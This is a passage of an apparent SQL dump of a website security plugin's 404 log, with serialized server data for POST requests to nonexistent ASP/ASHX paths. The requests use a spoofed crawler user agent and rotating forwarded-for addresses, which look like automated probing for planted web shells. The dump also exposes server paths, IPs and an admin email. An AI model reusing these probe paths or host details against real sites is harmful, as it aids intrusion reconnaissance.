http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.192.170.14\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.192.170.14\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/Enrol/500.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/Enrol/500.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XateArP2yel5jEccgdeUdAAAAZE\";s:12:\"REDIRECT_URL\";s:14:\"/Enrol/500.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/Enrol/500.asp\";s:10:\"SCRIPT_URL\";s:14:\"/Enrol/500.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XateArP2yel5jEccgdeUdAAAAZE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511810.2849\";s:12:\"REQUEST_TIME\";s:10:\"1571511810\";}}','notice','2019-10-19 19:03:32','2019-10-19 19:03:30',35267896,37064400,'http://bintara.com.my//Enrol/500.asp',1,0,'220.192.170.14'),(28438,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//js/min.mod.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"203.174.111.62\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"203.174.111.62\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/js/min.mod.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/js/min.mod.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XateZfVzlVwlNsD8qm@3hAAAANE\";s:12:\"REDIRECT_URL\";s:16:\"/js/min.mod.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63778\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/js/min.mod.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/js/min.mod.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XateZfVzlVwlNsD8qm@3hAAAANE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511909.9738\";s:12:\"REQUEST_TIME\";s:10:\"1571511909\";}}','notice','2019-10-19 19:05:11','2019-10-19 19:05:10',35771160,37582696,'http://bintara.com.my//js/min.mod.ashx',1,0,'203.174.111.62'),(28439,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//js/min.mod.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"58.196.182.150\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"58.196.182.150\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/js/min.mod.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/js/min.mod.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XategLP2yel5jEccgdeUyQAAAZA\";s:12:\"REDIRECT_URL\";s:16:\"/js/min.mod.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62456\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/js/min.mod.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/js/min.mod.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XategLP2yel5jEccgdeUyQAAAZA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511936.5704\";s:12:\"REQUEST_TIME\";s:10:\"1571511936\";}}','notice','2019-10-19 19:05:38','2019-10-19 19:05:36',35342944,37136688,'http://bintara.com.my//js/min.mod.ashx',1,0,'58.196.182.150'),(28440,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//js/min.mod.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.133.212.248\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.133.212.248\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/js/min.mod.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/js/min.mod.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatelLVvTBqXFHRB7z8z6QAAAAM\";s:12:\"REDIRECT_URL\";s:16:\"/js/min.mod.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63112\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/js/min.mod.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/js/min.mod.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatelLVvTBqXFHRB7z8z6QAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511957.1049\";s:12:\"REQUEST_TIME\";s:10:\"1571511957\";}}','notice','2019-10-19 19:05:58','2019-10-19 19:05:57',35266496,37066312,'http://bintara.com.my//js/min.mod.ashx',1,0,'61.133.212.248'),(28441,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"60.235.126.108\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"60.235.126.108\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatepoq@uz@DI827WH6wMwAAAUY\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatepoq@uz@DI827WH6wMwAAAUY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571511975.063\";s:12:\"REQUEST_TIME\";s:10:\"1571511975\";}}','notice','2019-10-19 19:06:16','2019-10-19 19:06:15',35343808,37148432,'http://bintara.com.my//inc/config.asp',1,0,'60.235.126.108'),(28442,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.65.84.185\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.65.84.185\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatesrP2yel5jEccgdeU6gAAAYo\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatesrP2yel5jEccgdeU6gAAAYo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511986.6642\";s:12:\"REQUEST_TIME\";s:10:\"1571511986\";}}','notice','2019-10-19 19:06:28','2019-10-19 19:06:27',35270464,37077936,'http://bintara.com.my//inc/config.asp',1,0,'218.65.84.185'),(28443,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"//neiye.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"210.77.90.70\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"210.77.90.70\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"http://bintara.com.my/neiye.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/neiye.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatfM4q@uz@DI827WH6wVgAAAUE\";s:12:\"REDIRECT_URL\";s:10:\"/neiye.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63355\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"http://bintara.com.my/neiye.asp\";s:10:\"SCRIPT_URL\";s:10:\"/neiye.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatfM4q@uz@DI827WH6wVgAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512115.8753\";s:12:\"REQUEST_TIME\";s:10:\"1571512115\";}}','notice','2019-10-19 19:08:37','2019-10-19 19:08:36',35338320,37132480,'http://bintara.com.my//neiye.asp',1,0,'210.77.90.70'),(28444,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"//neiye.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.237.222.103\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.237.222.103\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"http://bintara.com.my/neiye.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/neiye.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatfRI7-RFqMeLUZjguesAAAAIg\";s:12:\"REDIRECT_URL\";s:10:\"/neiye.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"http://bintara.com.my/neiye.asp\";s:10:\"SCRIPT_URL\";s:10:\"/neiye.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatfRI7-RFqMeLUZjguesAAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512132.5642\";s:12:\"REQUEST_TIME\";s:10:\"1571512132\";}}','notice','2019-10-19 19:08:54','2019-10-19 19:08:52',35269440,37073200,'http://bintara.com.my//neiye.asp',1,0,'61.237.222.103'),(28445,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//AD/ADCouna.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"116.254.199.110\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"116.254.199.110\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/AD/ADCouna.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/AD/ADCouna.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatfXPVzlVwlNsD8qm@3ygAAANI\";s:12:\"REDIRECT_URL\";s:15:\"/AD/ADCouna.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/AD/ADCouna.asp\";s:10:\"SCRIPT_URL\";s:15:\"/AD/ADCouna.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatfXPVzlVwlNsD8qm@3ygAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512156.7112\";s:12:\"REQUEST_TIME\";s:10:\"1571512156\";}}','notice','2019-10-19 19:09:19','2019-10-19 19:09:17',35342752,37140480,'http://bintara.com.my//AD/ADCouna.asp',1,0,'116.254.199.110'),(28446,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//kh/flash.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 